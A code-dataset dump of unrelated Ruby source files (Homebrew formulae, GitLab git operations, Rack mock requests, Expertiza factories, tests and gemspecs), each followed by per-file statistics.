sha256 "d004f9d2ef1b642f8128c368e57235f6d2580fd90d928da9996684430a6881ee" => :big_sur
sha256 "a6f6f99e3b12dca8a56919d1144b10e43a9059e7691d56dfdf8aab330e6febe8" => :catalina
sha256 "a868fba582ce440a14ae18d4be193209e7d25fd3291b568bea7f123e61aa044d" => :mojave
sha256 "0c9aff3582ad05a388cba8c43770ead295d921a8e419323a3c4115f09e609ba1" => :high_sierra
sha256 "7f65668b7bb036fb19e69bdc9cbc2ec48728bc8c1936253f6d5e8d74a113a3fd" => :sierra
sha256 "e4b3e2e66c2f772a38de529b884091a2ffa1f920af6604696129d21cc9e70b99" => :el_capitan
sha256 "9285766e0502b88c62d3d295402a41c46b8d9d2707a492bb5d70484b1080c212" => :yosemite
sha256 "f9ea5a2984d676db153d2128b1aa84a413edb93692e9c6be8147e5a856d42972" => :mavericks
sha256 "993d951d168210668304d0363b9f8eba6e7f5037537fc49bb12dc013c0e518e1" => :x86_64_linux
end
depends_on "cmake" => :build
def install
system "cmake", ".", *std_cmake_args
system "make", "install"
end
test do
# Check to see if vramsteg can obtain the current time as epoch
assert_match /^\d+$/, shell_output("#{bin}/vramsteg --now")
end
end
| 42.052632 | 94 | 0.783479 |
6a7d1594ad7aec43ac71f83d3e7e4176be2b5acd | 1,189 | # frozen_string_literal: true
module Stupidedi
module Versions
module FunctionalGroups
module FiftyTen
module SegmentDefs
s = Schema
e = ElementDefs
r = ElementReqs
HD = s::SegmentDef.build(:HD, "Health Coverage",
"To provide information on health coverage",
e::E875 .simple_use(r::Mandatory, s::RepeatCount.bounded(1)),
e::E1203.simple_use(r::Optional, s::RepeatCount.bounded(1)),
e::E1205.simple_use(r::Optional, s::RepeatCount.bounded(1)),
e::E1204.simple_use(r::Optional, s::RepeatCount.bounded(1)),
e::E1207.simple_use(r::Optional, s::RepeatCount.bounded(1)),
e::E609 .simple_use(r::Optional, s::RepeatCount.bounded(1)),
e::E609 .simple_use(r::Optional, s::RepeatCount.bounded(1)),
e::E1209.simple_use(r::Optional, s::RepeatCount.bounded(1)),
e::E1073.simple_use(r::Optional, s::RepeatCount.bounded(1)),
e::E1211.simple_use(r::Optional, s::RepeatCount.bounded(1)),
e::E1073.simple_use(r::Optional, s::RepeatCount.bounded(1)))
end
end
end
end
end
| 37.15625 | 73 | 0.602187 |
acb78fd4bc110da7abf45abad63ce340616f1a75 | 1,980 | # frozen_string_literal: true
require 'tempfile'
SiteHealth.require_optional_dependency('html-proofer')
module SiteHealth
# Checks for various HTML misstakes (backed by the excellent HTMLProofer gem)
class HTMLProofer < Checker
name 'html_proofer'
types 'html'
protected
def check
tempfile(page.body) do |file|
proofer = ::HTMLProofer.check_file(file.path, config.html_proofer.to_h)
# NOTE: HTMLProofer raises if errors are found
begin
proofer.run
rescue StandardError
end
errors = build_test_failures(proofer.failed_tests).each do |error|
add_issue(title: error)
end
add_data(errors: errors)
end
end
# @return [Array<String>] list failures
def build_test_failures(failed_tests)
failed_tests.map do |failed_test|
next if ignore_test_failure?(failed_test)
failed_test.split('.html:').last.strip # Removes file name from error message
end.compact
end
# HTMLProofer expects internal links to be present on disk, Jekyll-style,
# since we're checking remote pages we ignore those failures
# @return [TrueClass, FalseClass] returns true if the failed test should be ignored
def ignore_test_failure?(failed_test)
return false unless config.html_proofer.ignore_missing_internal_links
return true if failed_test.include?('internally linking to')
return true if failed_test.include?('internal image')
return true if failed_test.include?('internal script')
false
end
# Creates a tempfile around the passed block
# @return [Object] whatever the passed block returns
# @yieldparam [Tempfile] the temporary file
def tempfile(string)
file = Tempfile.new([name, '.html'])
begin
file.write(string)
ensure
file.close
end
yield(file).tap { file.unlink }
end
end
SiteHealth.register_checker(HTMLProofer)
end
| 29.117647 | 87 | 0.687374 |
7990a3339e8f02611dbe7fb48a6c8e375efd2535 | 1,574 | # frozen_string_literal: false
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file in README.md and
# CONTRIBUTING.md located at the root of this package.
#
# ----------------------------------------------------------------------------
require 'google/container/property/regionalcluster_addons_config_horizontal_pod_autoscaling'
require 'google/container/property/regionalcluster_addons_config_http_load_balancing'
module GoogleInSpec
module Container
module Property
class RegionalClusterAddonsConfig
attr_reader :http_load_balancing
attr_reader :horizontal_pod_autoscaling
def initialize(args = nil, parent_identifier = nil)
return if args.nil?
@parent_identifier = parent_identifier
@http_load_balancing = GoogleInSpec::Container::Property::RegionalClusterAddonsConfigHttpLoadBalancing.new(args['httpLoadBalancing'], to_s)
@horizontal_pod_autoscaling = GoogleInSpec::Container::Property::RegionalClusterAddonsConfigHorizontalPodAutoscaling.new(args['horizontalPodAutoscaling'], to_s)
end
def to_s
"#{@parent_identifier} RegionalClusterAddonsConfig"
end
end
end
end
end
| 39.35 | 170 | 0.625794 |
ed6ea638235cb4c84f40e66383afc935d34a12ff | 4,500 | class GitOperationService
attr_reader :user, :repository
def initialize(new_user, new_repository)
@user = new_user
@repository = new_repository
end
def add_branch(branch_name, newrev)
ref = Gitlab::Git::BRANCH_REF_PREFIX + branch_name
oldrev = Gitlab::Git::BLANK_SHA
update_ref_in_hooks(ref, newrev, oldrev)
end
def rm_branch(branch)
ref = Gitlab::Git::BRANCH_REF_PREFIX + branch.name
oldrev = branch.target
newrev = Gitlab::Git::BLANK_SHA
update_ref_in_hooks(ref, newrev, oldrev)
end
def add_tag(tag_name, newrev, options = {})
ref = Gitlab::Git::TAG_REF_PREFIX + tag_name
oldrev = Gitlab::Git::BLANK_SHA
with_hooks(ref, newrev, oldrev) do |service|
# We want to pass the OID of the tag object to the hooks. For an
# annotated tag we don't know that OID until after the tag object
# (raw_tag) is created in the repository. That is why we have to
# update the value after creating the tag object. Only the
# "post-receive" hook will receive the correct value in this case.
raw_tag = repository.rugged.tags.create(tag_name, newrev, options)
service.newrev = raw_tag.target_id
end
end
def rm_tag(tag)
ref = Gitlab::Git::TAG_REF_PREFIX + tag.name
oldrev = tag.target
newrev = Gitlab::Git::BLANK_SHA
update_ref_in_hooks(ref, newrev, oldrev) do
repository.rugged.tags.delete(tag_name)
end
end
# Whenever `start_branch_name` is passed, if `branch_name` doesn't exist,
# it would be created from `start_branch_name`.
# If `start_project` is passed, and the branch doesn't exist,
# it would try to find the commits from it instead of current repository.
def with_branch(
branch_name,
start_branch_name: nil,
start_project: repository.project,
&block)
start_repository = start_project.repository
start_branch_name = nil if start_repository.empty_repo?
if start_branch_name && !start_repository.branch_exists?(start_branch_name)
raise ArgumentError, "Cannot find branch #{start_branch_name} in #{start_repository.path_with_namespace}"
end
update_branch_with_hooks(branch_name) do
repository.with_repo_branch_commit(
start_repository,
start_branch_name || branch_name,
&block)
end
end
private
def update_branch_with_hooks(branch_name)
update_autocrlf_option
was_empty = repository.empty?
# Make commit
newrev = yield
unless newrev
raise Repository::CommitError.new('Failed to create commit')
end
branch = repository.find_branch(branch_name)
oldrev = find_oldrev_from_branch(newrev, branch)
ref = Gitlab::Git::BRANCH_REF_PREFIX + branch_name
update_ref_in_hooks(ref, newrev, oldrev)
# If repo was empty expire cache
repository.after_create if was_empty
repository.after_create_branch if
was_empty || Gitlab::Git.blank_ref?(oldrev)
newrev
end
def find_oldrev_from_branch(newrev, branch)
return Gitlab::Git::BLANK_SHA unless branch
oldrev = branch.target
if oldrev == repository.rugged.merge_base(newrev, branch.target)
oldrev
else
raise Repository::CommitError.new('Branch diverged')
end
end
def update_ref_in_hooks(ref, newrev, oldrev)
with_hooks(ref, newrev, oldrev) do
update_ref(ref, newrev, oldrev)
end
end
def with_hooks(ref, newrev, oldrev)
GitHooksService.new.execute(
user,
repository.path_to_repo,
oldrev,
newrev,
ref) do |service|
yield(service)
end
end
def update_ref(ref, newrev, oldrev)
# We use 'git update-ref' because libgit2/rugged currently does not
# offer 'compare and swap' ref updates. Without compare-and-swap we can
# (and have!) accidentally reset the ref to an earlier state, clobbering
# commits. See also https://github.com/libgit2/libgit2/issues/1534.
command = %W[#{Gitlab.config.git.bin_path} update-ref --stdin -z]
_, status = Gitlab::Popen.popen(
command,
repository.path_to_repo) do |stdin|
stdin.write("update #{ref}\x00#{newrev}\x00#{oldrev}\x00")
end
unless status.zero?
raise Repository::CommitError.new(
"Could not update branch #{Gitlab::Git.branch_name(ref)}." \
" Please refresh and try again.")
end
end
def update_autocrlf_option
if repository.raw_repository.autocrlf != :input
repository.raw_repository.autocrlf = :input
end
end
end
| 28.66242 | 111 | 0.7 |
e2fd16fbd38a3de942f6039cbfcf58643577a2cc | 833 | require_relative 'test_helper'
require 'apartment/resolvers/database'
class ExcludedModelsTest < Apartment::Test
def setup
setup_connection("mysql")
Apartment.configure do |config|
config.tenant_resolver = Apartment::Resolvers::Database
config.excluded_models = %w(Company User)
end
super
end
def test_model_exclusions
Apartment::Tenant.adapter.process_excluded_models
assert_equal :_apartment_excluded, Company.connection_specification_name
Apartment::Tenant.switch(@tenant1) do
assert_tenant_is(@tenant1)
assert_tenant_is(Apartment.default_tenant, for_model: Company)
end
end
def test_all_excluded_models_use_same_connection_pool
Apartment::Tenant.adapter.process_excluded_models
assert_equal Company.connection_pool, User.connection_pool
end
end
| 25.242424 | 76 | 0.777911 |
2166841f2ae7297458735af495e60e882d26d06c | 3,624 | # This file defines factory methods that are functionally related
# to the Expertiza quiz feature. Factories can be used to create
# objects unique to quizzes, including:
# QuizQuestionnaire
# QuizQuestion
# QuizQuestionChoice
# QuizResponseMap
# QuizResponse
# Answer
#
# Note that many of these classes are subclasses specializing
# in quizzing and that the superclasses have a winder purpose.
# Additionally, objects that are not unique to quizzing but
# which show up in the relationships can be found in
# factories.rb.
FactoryBot.define do
# Quiz Questionnaire is the main representation of a quiz
# in the Expertiza model. It shares a one-to-many relationship
# with QuizQuestion and QuizResponseMap, and foreign keys
# to an AssignmentTeam. It is important to note that
# the instructor_id field, a holdover from the Questionaire
# superclass, is the field used to store the team id.
factory :quiz_questionnaire, class: QuizQuestionnaire do
name 'Quiz Questionnaire'
instructor_id { AssignmentTeam.first.id || association(:assignment_team).id }
private 0
min_question_score 0
max_question_score 1
type 'QuizQuestionnaire'
display_type 'Quiz'
instruction_loc nil
end
# Quiz Question is the main representation of a single question
# in a quiz questionnaire. It stores the question text, type,
# and shares a many-to-one relationship with quiz questionnaire.
# Each quiz question shares a one-to-many relationship with
# quiz question choices and answers.
factory :quiz_question, class: QuizQuestion do
txt 'Question'
weight 1
questionnaire { QuizQuestionnaire.first || association(:quiz_questionnaire) }
quiz_question_choices { [QuizQuestionChoice.first] || association(:quiz_question_choices) }
seq 1.0
type 'MultipleChoiceRadio'
end
# Quiz Question Choice stores the definition for each individual
# choice within a question. It foreign keys to its associated
# question.
factory :quiz_question_choice, class: QuizQuestionChoice do
question { QuizQuestion.first || association(:quiz_question) }
txt 'Answer Choice 1'
iscorrect 0
end
# Quiz Response Map is a relationship between a Quiz Questionnaire,
# an Assignment Team, and a Participant. The reviewer is an
# individual participant who is taking the quiz, the reviewee is
# the team that created the quiz questionnaire.
factory :quiz_response_map, class: QuizResponseMap do
quiz_questionnaire { QuizQuestionnaire.first || association(:quiz_questionnaire) }
reviewer { Participant.first || association(:participant) }
reviewee_id { Teams.first.id || association(:team).id }
end
# Quiz Response represents a single response to a quiz
# questionnaire. It foreign keys to a quiz response map.
factory :quiz_response, class: QuizResponse do
response_map { QuizResponseMap.first || association(:response_map) }
is_submitted 1
end
# Answer records a participants answer to a single quiz
# question. It shares a many-to-one relationship with
# quiz question and quiz response.
factory :answer, class: Answer do
question { Question.first || association(:question) }
response { Response.first || association(:response) }
answer 1
comments 'Answer text'
end
# ScoreView contains data from Questions, Questionnaire
# and Answer tables and has all the information necessary
# to calculate weighted grades
factory :score_view, class: ScoreView do
q1_id 1
s_question_id 1
question_weight 1
s_score 1
s_response_id 1
s_comments "test comment"
end
end
| 37.75 | 95 | 0.750828 |
33c87a3525701c8d80b77cc3352603085292f425 | 1,995 | # typed: ignore
require 'ddtrace/contrib/support/spec_helper'
require_relative 'support/helper'
RSpec.describe 'ClientTracerTest' do
include_context 'Sidekiq testing'
subject(:perform_async) { job_class.perform_async }
let(:job_class) { EmptyWorker }
before do
Sidekiq.configure_client do |config|
config.client_middleware.clear
config.client_middleware do |chain|
chain.add(Datadog::Contrib::Sidekiq::ClientTracer)
end
end
Sidekiq::Testing.server_middleware.clear
Sidekiq::Extensions.enable_delay! if Sidekiq::VERSION > '5.0.0'
end
it 'traces job push' do
perform_async
expect(span.service).to eq('sidekiq-client')
expect(span.resource).to eq('EmptyWorker')
expect(span.get_tag('sidekiq.job.queue')).to eq('default')
expect(span.status).to eq(0)
expect(span.parent).to be_nil
expect(span.get_metric('_dd.measured')).to be_nil
end
context 'with nested trace' do
it 'traces job push' do
tracer.trace('parent.span', service: 'parent-service') do
perform_async
end
expect(spans).to have(2).items
parent_span, child_span = spans
expect(parent_span.name).to eq('parent.span')
expect(parent_span.status).to eq(0)
expect(parent_span.parent).to be_nil
expect(child_span.service).to eq('sidekiq-client')
expect(child_span.resource).to eq('EmptyWorker')
expect(child_span.get_tag('sidekiq.job.queue')).to eq('default')
expect(child_span.status).to eq(0)
expect(child_span.parent).to eq(parent_span)
expect(child_span.get_metric('_dd.measured')).to be_nil
end
end
context 'with delayed extensions' do
subject(:do_work) { DelayableClass.delay.do_work }
before do
stub_const('DelayableClass', Class.new do
def self.do_work; end
end)
end
it 'traces with correct resource' do
do_work
expect(spans.first.resource).to eq('DelayableClass.do_work')
end
end
end
| 27.328767 | 70 | 0.690226 |
627ee4a66e2ddbbfc2c95831cb6a747e3cacdd78 | 974 | class Chicken < Formula
desc "Compiler for the Scheme programming language"
homepage "http://www.call-cc.org/"
url "http://code.call-cc.org/releases/4.10.0/chicken-4.10.0.tar.gz"
sha256 "0e07f5abcd11961986950dbeaa5a40db415f8a1b65daff9c300e9b05b334899b"
head "http://code.call-cc.org/git/chicken-core.git"
bottle do
sha256 "829af14ce63b487de7300073f256efbea7ecbd876ee577bff1dbc3080ec60c3b" => :yosemite
sha256 "7b2c75d1cd7d3f74881885d6bf7522597beefe35a1ce99715ea1dff35d579e4b" => :mavericks
sha256 "1f46226c58b1b7cd92f4d0c68cc0583e2c5ec4c2cce60b53193afca9a5d8be19" => :mountain_lion
end
def install
ENV.deparallelize
args = %W[
PLATFORM=macosx
PREFIX=#{prefix}
C_COMPILER=#{ENV.cc}
LIBRARIAN=ar
POSTINSTALL_PROGRAM=install_name_tool
]
system "make", *args
system "make", "install", *args
end
test do
assert_equal "25", shell_output("#{bin}/csi -e '(print (* 5 5))'").strip
end
end
| 28.647059 | 95 | 0.725873 |
1df961b31dd0e603bf94cf3012e1dfd037411061 | 59 | module Kickscraper
class Update < Api
end
end | 11.8 | 22 | 0.627119 |
26f484a8940375525125dac7739fdc0df4c7d9e6 | 5,090 | require 'uri'
require 'stringio'
require 'rack'
require 'rack/lint'
require 'rack/utils'
require 'rack/response'
module Rack
# Rack::MockRequest helps testing your Rack application without
# actually using HTTP.
#
# After performing a request on a URL with get/post/put/delete, it
# returns a MockResponse with useful helper methods for effective
# testing.
#
# You can pass a hash with additional configuration to the
# get/post/put/delete.
# <tt>:input</tt>:: A String or IO-like to be used as rack.input.
# <tt>:fatal</tt>:: Raise a FatalWarning if the app writes to rack.errors.
# <tt>:lint</tt>:: If true, wrap the application in a Rack::Lint.
class MockRequest
class FatalWarning < RuntimeError
end
class FatalWarner
def puts(warning)
raise FatalWarning, warning
end
def write(warning)
raise FatalWarning, warning
end
def flush
end
def string
""
end
end
DEFAULT_ENV = {
"rack.version" => Rack::VERSION,
"rack.input" => StringIO.new,
"rack.errors" => StringIO.new,
"rack.multithread" => true,
"rack.multiprocess" => true,
"rack.run_once" => false,
}
def initialize(app)
@app = app
end
def get(uri, opts={}) request("GET", uri, opts) end
def post(uri, opts={}) request("POST", uri, opts) end
def put(uri, opts={}) request("PUT", uri, opts) end
def delete(uri, opts={}) request("DELETE", uri, opts) end
def request(method="GET", uri="", opts={})
env = self.class.env_for(uri, opts.merge(:method => method))
if opts[:lint]
app = Rack::Lint.new(@app)
else
app = @app
end
errors = env["rack.errors"]
MockResponse.new(*(app.call(env) + [errors]))
end
# Return the Rack environment used for a request to +uri+.
def self.env_for(uri="", opts={})
uri = URI(uri)
uri.path = "/#{uri.path}" unless uri.path[0] == ?/
env = DEFAULT_ENV.dup
env["REQUEST_METHOD"] = opts[:method] ? opts[:method].to_s.upcase : "GET"
env["SERVER_NAME"] = uri.host || "example.org"
env["SERVER_PORT"] = uri.port ? uri.port.to_s : "80"
env["QUERY_STRING"] = uri.query.to_s
env["PATH_INFO"] = (!uri.path || uri.path.empty?) ? "/" : uri.path
env["rack.url_scheme"] = uri.scheme || "http"
env["HTTPS"] = env["rack.url_scheme"] == "https" ? "on" : "off"
env["SCRIPT_NAME"] = opts[:script_name] || ""
if opts[:fatal]
env["rack.errors"] = FatalWarner.new
else
env["rack.errors"] = StringIO.new
end
if params = opts[:params]
if env["REQUEST_METHOD"] == "GET"
params = Utils.parse_nested_query(params) if params.is_a?(String)
params.update(Utils.parse_nested_query(env["QUERY_STRING"]))
env["QUERY_STRING"] = Utils.build_nested_query(params)
elsif !opts.has_key?(:input)
opts["CONTENT_TYPE"] = "application/x-www-form-urlencoded"
if params.is_a?(Hash)
if data = Utils::Multipart.build_multipart(params)
opts[:input] = data
opts["CONTENT_LENGTH"] ||= data.length.to_s
opts["CONTENT_TYPE"] = "multipart/form-data; boundary=#{Utils::Multipart::MULTIPART_BOUNDARY}"
else
opts[:input] = Utils.build_nested_query(params)
end
else
opts[:input] = params
end
end
end
empty_str = ""
empty_str.force_encoding("ASCII-8BIT") if empty_str.respond_to? :force_encoding
opts[:input] ||= empty_str
if String === opts[:input]
rack_input = StringIO.new(opts[:input])
else
rack_input = opts[:input]
end
rack_input.set_encoding(Encoding::BINARY) if rack_input.respond_to?(:set_encoding)
env['rack.input'] = rack_input
env["CONTENT_LENGTH"] ||= env["rack.input"].length.to_s
opts.each { |field, value|
env[field] = value if String === field
}
env
end
end
# Rack::MockResponse provides useful helpers for testing your apps.
# Usually, you don't create the MockResponse on your own, but use
# MockRequest.
class MockResponse
def initialize(status, headers, body, errors=StringIO.new(""))
@status = status.to_i
@original_headers = headers
@headers = Rack::Utils::HeaderHash.new
headers.each { |field, values|
@headers[field] = values
@headers[field] = "" if (values.nil? || values.empty?)
}
@body = ""
body.each { |part| @body << part }
@errors = errors.string if errors.respond_to?(:string)
end
# Status
attr_reader :status
# Headers
attr_reader :headers, :original_headers
def [](field)
headers[field]
end
# Body
attr_reader :body
def =~(other)
@body =~ other
end
def match(other)
@body.match other
end
# Errors
attr_accessor :errors
include Response::Helpers
end
end
| 26.649215 | 108 | 0.594303 |
5df88d5626f7a673eed64aeaa304c415d214d85b | 939 | class CreateUserAuthentications < ActiveRecord::Migration
def change
create_table :user_authentications do |t|
t.integer :user_id
t.string :uuid
t.string :uid
t.string :provider
t.string :name
t.string :email
t.string :username
t.string :token
t.string :secret
t.string :refresh_token
t.datetime :token_expires_at
t.string :avatar_file_name
t.string :avatar_content_type
t.integer :avatar_file_size, default: 0
t.datetime :avatar_updated_at
t.string :profile_url
t.string :profile_image_url
t.date :birthday
t.string :locale
t.string :gender
t.integer :status, default: 0
t.timestamps
end
add_index :user_authentications, [:uuid], unique: true
add_index :user_authentications, [:uid,:provider]
end
end
| 27.617647 | 58 | 0.603834 |
b94343ed2596027ea51bda126175f81e7ca535df | 91 | module Japanese
module Train
module Access
VERSION = "1.1.0"
end
end
end
| 11.375 | 23 | 0.615385 |
01d0fd227c7c2252fc5f767c8245a7b82bde5df0 | 212 | module Mole
module Version
MAJOR = 1
MINOR = 0
TINY = 15
# Returns the version string for the library.
#
def self.version
[ MAJOR, MINOR, TINY].join( "." )
end
end
end
| 13.25 | 49 | 0.556604 |
39194baab3e30d29a3fe3e8fdd9387a565f7ce98 | 637 | Pod::Spec.new do |s|
s.name = 'MSCircularSlider'
s.version = '1.2.2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.authors = { 'ThunderStruct' => '[email protected]' }
s.summary = 'A full-featured circular slider for iOS applications'
s.homepage = 'https://github.com/ThunderStruct/MSCircularSlider'
# Source Info
s.platform = :ios, '9.3'
s.source = { :git => 'https://github.com/ThunderStruct/MSCircularSlider.git', :branch => "master", :tag => "1.2.2" }
s.source_files = 'MSCircularSlider/*.{swift}'
s.requires_arc = true
end
| 39.8125 | 127 | 0.587127 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.